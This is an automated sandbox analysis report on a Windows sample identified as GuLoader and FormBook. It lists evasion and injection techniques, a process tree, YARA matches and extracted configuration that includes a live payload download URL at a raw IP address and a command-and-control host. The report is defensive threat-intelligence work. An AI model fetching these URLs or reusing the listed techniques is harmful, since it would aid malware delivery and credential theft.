Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report POLITICALLY.exe

Overview

General Information

Sample Name:POLITICALLY.exe
Analysis ID:411376
MD5:80b3365808440838596864bd6d492c02
SHA1:ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256:8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • POLITICALLY.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)
    • POLITICALLY.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6028 cmdline: /c del 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}

Threatname: GuLoader

{"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166b9:$sqlite3step: 68 34 1C 7B E1
      • 0x167cc:$sqlite3step: 68 34 1C 7B E1
      • 0x166e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1680d:$sqlite3text: 68 38 2A 90 C5
      • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
      0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: POLITICALLY.exeVirustotal: Detection: 17%Perma Link
        Source: POLITICALLY.exeReversingLabs: Detection: 17%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
        Source: 23.2.control.exe.4fb518.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 23.2.control.exe.4d37960.4.unpackAvira: Label: TR/Dropper.Gen
        Source: POLITICALLY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
        Source: Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
        Source: Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
        Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx
        Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49744 -> 111.90.149.46:80
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.nortier.cloud/olg8/
        Source: Malware configuration extractorURLs: http://111.90.149.46/bin_XNLhDlJvG218.bin
        Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
        Source: global trafficHTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: unknownTCP traffic detected without corresponding DNS query: 111.90.149.46
        Source: global trafficHTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin/
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin3
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binb)
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binw
        Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpString found in binary or memory: http://111.90.149.46/in_XNLhDlJvG218.bin
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.6923599.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.6923599.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.6923599.com/olg8/www.wiseowldigital.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.6923599.comReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.artboxxstudio.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.artboxxstudio.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.artboxxstudio.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.assroyalty.club
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.assroyalty.club/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.assroyalty.club/olg8/www.tuancai.net
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.assroyalty.clubReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.auroraleathers.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.auroraleathers.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.auroraleathers.com/olg8/www.artboxxstudio.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.auroraleathers.comReferer:
        Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.cunerier.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.cunerier.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.cunerier.com/olg8/www.purplebean.company
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.cunerier.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.easiersell.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.easiersell.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.easiersell.com/olg8/www.assroyalty.club
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.easiersell.comReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.moopyo.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.moopyo.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.moopyo.com/olg8/www.morgolf.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.moopyo.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.morgolf.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.morgolf.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.morgolf.com/olg8/www.easiersell.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.morgolf.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.nortier.cloud
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.nortier.cloud/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.nortier.cloudReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.onlinewomensclasses.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.onlinewomensclasses.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.onlinewomensclasses.com/olg8/www.policomercial.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.onlinewomensclasses.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.policomercial.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.policomercial.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.policomercial.com/olg8/www.6923599.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.policomercial.comReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.prismatiq.tech
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.prismatiq.tech/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.prismatiq.tech/olg8/www.soakstress.xyz
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.prismatiq.techReferer:
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.purplebean.company
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.purplebean.company/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.purplebean.company/olg8/www.nortier.cloud
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.purplebean.companyReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.soakstress.xyz
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.soakstress.xyz/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.soakstress.xyz/olg8/www.moopyo.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.soakstress.xyzReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.tuancai.net
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.tuancai.net/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.tuancai.net/olg8/www.auroraleathers.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.tuancai.netReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.wiseowldigital.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.wiseowldigital.com/olg8/
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.wiseowldigital.com/olg8/www.cunerier.com
        Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://www.wiseowldigital.comReferer:
        Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
